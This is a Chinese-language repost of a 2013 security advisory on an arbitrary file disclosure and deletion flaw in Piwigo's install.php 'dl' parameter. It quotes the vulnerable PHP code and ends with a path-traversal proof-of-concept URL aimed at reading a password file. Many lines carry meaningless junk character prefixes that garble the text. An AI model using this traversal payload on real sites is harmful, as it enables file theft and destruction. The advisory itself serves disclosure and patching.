Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
3 A/ T* c4 t4 P- O5 b
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
3 r# o. O6 Z8 w/ a- M====================================================================
/install.php:
( N# I6 t6 b# C% ~3 I; R% `" K! s-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
" J& C" u  B; S114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
$ m$ _4 }$ h/ j; W118:   header('Content-Disposition: attachment; filename="database.inc.php"');
; ?5 z; ?" b3 z0 ~: z119:   header('Content-Transfer-Encoding: binary');
4 o- v& ^$ {4 D. r7 V. t) h120:   header('Content-Length: '.filesize($filename));
! ?, k, m% o' W/ a121:   echo file_get_contents($filename);
% O; a* g( G4 A7 ]- L  Y; I122:   unlink($filename);
  @% K0 C" H% P# X  E6 a123:   exit();
124: }
====================================================================
) M8 N( P. A- u" \: M# _
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
/ x1 M" G" N9 u9 _/ p           Apache 2.4.2 (Win32)
           PHP 5.4.4
6 i1 f' r1 z( ?2 v           MySQL 5.5.25a
! s* H+ u4 y* K; r) ]  p/ @3 }, ?* P
! y% u2 p/ v' {, X* E5 O* EVulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
- i% Z+ m) k+ H" u! ^$ T, Z
& r1 G4 z; ?) e* G* n7 E; ?6 fAdvisory ID: ZSL-2013-5127
0 u4 Q+ j4 i" ]Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
# a$ J% k' L2 s4 ?  KVendor Patch: http://piwigo.org/bugs/view.php?id=2843
, c& {* `4 |4 X0 q' B' l- Q; Z
15.02.2013

--
' E, n+ t8 ~! T+ w# k  [( u( i" `http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt

8 |% D" o3 f* B4 @1 u  E3 D- t